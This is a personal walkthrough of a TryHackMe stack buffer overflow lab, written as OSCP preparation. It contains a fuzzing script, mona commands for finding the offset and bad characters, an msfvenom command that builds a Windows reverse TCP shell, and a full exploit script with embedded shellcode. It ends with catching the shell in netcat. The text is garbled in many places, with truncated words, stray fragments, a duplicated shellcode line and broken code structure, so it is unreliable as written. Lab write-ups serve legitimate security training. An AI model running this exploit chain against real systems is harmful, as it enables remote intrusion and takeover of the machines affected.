I’m attempting TryHackMe’s Buffer Overflow exercises in preparation for my OSCP

Wednesday, December 2, 2020 6:28 PM

Below are some of the resources for this lab. in the future, the remaining labs for my OSCP Journey will be moved to video as a youtube journal.

https://github.com/Tib3rius/Pentest-Cheatsheets/blob/master/ overflows.rst https://github.com/joshua17sc/Buffer-Overflows

Stack Based Buffer Overflow Prep


Access VM:

Rdesktop IP address






Use this code: (Type it out, not copy)


import sys, socket from time import sleep buffer = “A” * 100

while True: try:

payload = “OVERFLOW1 /.:/” + buffer

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((‘’,1337))

print (“[+] Sending the payload…\n” + str(len(buffer))) s.send((payload.encode()))



buffer = buffer + “A”*100 except:

print (“The fuzzing crashed at %s bytes” % str(len(buffer))) sys.exit()

Crash Replication & Controlling EIP:

Now generate a pattern based on the length of bytes to crash the server.

Copy the string from the ruby script into the payload variable within the exp

Ensure oscp.exe is running within Immunity Debugger. Execute exploit.py the target.



Back in Immunity search for the pattern using mona.

Switch over to the log window in Immunity Debugger with Alt+L and look “EIP contains normal pattern : “

k for the

Offset is “1978”

Update the offset and the retn variable.

Restart the .exe in Immunity Debugger with Ctrl+F12 and F9 to run. Exec exploit.py. If the offset is correct we should see “42424242” <- the B’s at cute the the EIP.

Finding Bad Characters:

Take note of the ESP address because we will be using the values in this p in future steps. Copy the string generator from the buffer overflow room.

Drop the new generated string into the payload variable in the exploit.py. position

This generated string has already removed the \x00 so we need to remove the .bin with mona.

!mona bytearray -b “\x00”

Ensure the .exe is running and kick off exploit.py. Now compare the .bin t loaded payload with mona.

that from

to the

For some reason, the mona compare command isn’t working in Tryhackm an email notifying them that this is an issue,

So I’m attempting to find bad characters manually:

Elimination process: “REMOVE THE 0A & 0D characters”

***Buffer should not include 00, 0A or 0D otherwise it will be truncated

I took away 07:

me, I sent

You can see that 08 has returned

07 08 2E 2F a0 a1

0A 0D 0A 0D 0A 0D

X. x. x

Are the bad characters I found

We got the bad chars already so let’s generate a new bytearray in mona wi updated bad chars we found.

!mona bytearray -b “\x00\x07\x2e\xa0”

Also, I need to update the payload variable with a new generated bad char my modified script like this:

from __future__ import print_functionlistRem = “\\x07\\x2e\\xa0”.split(“\ for x in range(1, 256): if “{:02x}”.format(x) not in listRem: print(“\\x” + “{:02x}”.format(x), end=”) print()

So I re ran the bad characters until I found Unmodified”. Which indicates more badchars exist. Next I’ll find the jump point command:


rs using \x”)


that no

Next I’m going to update the retn variable with the new address and must written backward (since the system is little-endian).


I’m going to create a payload:

msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT ‘\x00\x07\x2e\xa0’ EXITFUNC=thread -f python -v payload

Final code should look like this: import socket

ip = “” port = 1337

prefix = “OVERFLOW1 ” offset = 1978 overflow = “A” * offset retn = “\xaf\x11\x50\x62” padding = “\x90″ * 16 payload = b””

payload += b”\xda\xdb\xbb\x73\xb7\xa4\xf8\xd9\x74\x24\xf4\x5a” payload += b”\x33\xc9\xb1\x52\x31\x5a\x17\x83\xc2\x04\x03\x29″ payload += b”\xa4\x46\x0d\x31\x22\x04\xee\xc9\xb3\x69\x66\x2c” payload += b”\x82\xa9\x1c\x25\xb5\x19\x56\x6b\x3a\xd1\x3a\x9f” payload += b”\xc9\x97\x92\x90\x7a\x1d\xc5\x9f\x7b\x0e\x35\xbe” payload += b”\xff\x4d\x6a\x60\xc1\x9d\x7f\x61\x06\xc3\x72\x33″ payload += b”\xdf\x8f\x21\xa3\x54\xc5\xf9\x48\x26\xcb\x79\xad” payload += b”\xff\xea\xa8\x60\x8b\xb4\x6a\x83\x58\xcd\x22\x9b” payload += b”\xbd\xe8\xfd\x10\x75\x86\xff\xf0\x47\x67\x53\x3d” payload += b”\x68\x9a\xad\x7a\x4f\x45\xd8\x72\xb3\xf8\xdb\x41″ be

T> -b

payload += b”\x68\x9a\xad\x7a\x4f\x45\xd8\x72\xb3\xf8\xdb\x41″ payload += b”\xc9\x26\x69\x51\x69\xac\xc9\xbd\x8b\x61\x8f\x36″ payload += b”\x87\xce\xdb\x10\x84\xd1\x08\x2b\xb0\x5a\xaf\xfb” payload += b”\x30\x18\x94\xdf\x19\xfa\xb5\x46\xc4\xad\xca\x98″ payload += b”\xa7\x12\x6f\xd3\x4a\x46\x02\xbe\x02\xab\x2f\x40″ payload += b”\xd3\xa3\x38\x33\xe1\x6c\x93\xdb\x49\xe4\x3d\x1c” payload += b”\xad\xdf\xfa\xb2\x50\xe0\xfa\x9b\x96\xb4\xaa\xb3″ payload += b”\x3f\xb5\x20\x43\xbf\x60\xe6\x13\x6f\xdb\x47\xc3″ payload += b”\xcf\x8b\x2f\x09\xc0\xf4\x50\x32\x0a\x9d\xfb\xc9″ payload += b”\xdd\xa8\xf9\xe4\xf5\xc5\xff\x06\x17\x4a\x89\xe0″ payload += b”\x7d\x62\xdf\xbb\xe9\x1b\x7a\x37\x8b\xe4\x50\x32″ payload += b”\x8b\x6f\x57\xc3\x42\x98\x12\xd7\x33\x68\x69\x85″ payload += b”\x92\x77\x47\xa1\x79\xe5\x0c\x31\xf7\x16\x9b\x66″ payload += b”\x50\xe8\xd2\xe2\x4c\x53\x4d\x10\x8d\x05\xb6\x90″ payload += b”\x4a\xf6\x39\x19\x1e\x42\x1e\x09\xe6\x4b\x1a\x7d” payload += b”\xb6\x1d\xf4\x2b\x70\xf4\xb6\x85\x2a\xab\x10\x41″ payload += b”\xaa\x87\xa2\x17\xb3\xcd\x54\xf7\x02\xb8\x20\x08″ payload += b”\xaa\x2c\xa5\x71\xd6\xcc\x4a\xa8\x52\xec\xa8\x78″ payload += b”\xaf\x85\x74\xe9\x12\xc8\x86\xc4\x51\xf5\x04\xec” payload += b”\x29\x02\x14\x85\x2c\x4e\x92\x76\x5d\xdf\x77\x78″ payload += b”\xf2\xe0\x5d” postfix = “” buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)


s.connect((ip, port)) print(“Sending evil buffer…”) s.send(buffer + “\r\n”) print(“Done!”) except: print(“Could not connect.”)

print(“Could not connect.”)

Let’s Run the Application again and set Netcat to “nc 444 (fr whatever port we used in msfvenom code”

And the result is “root”:


Overflow 2: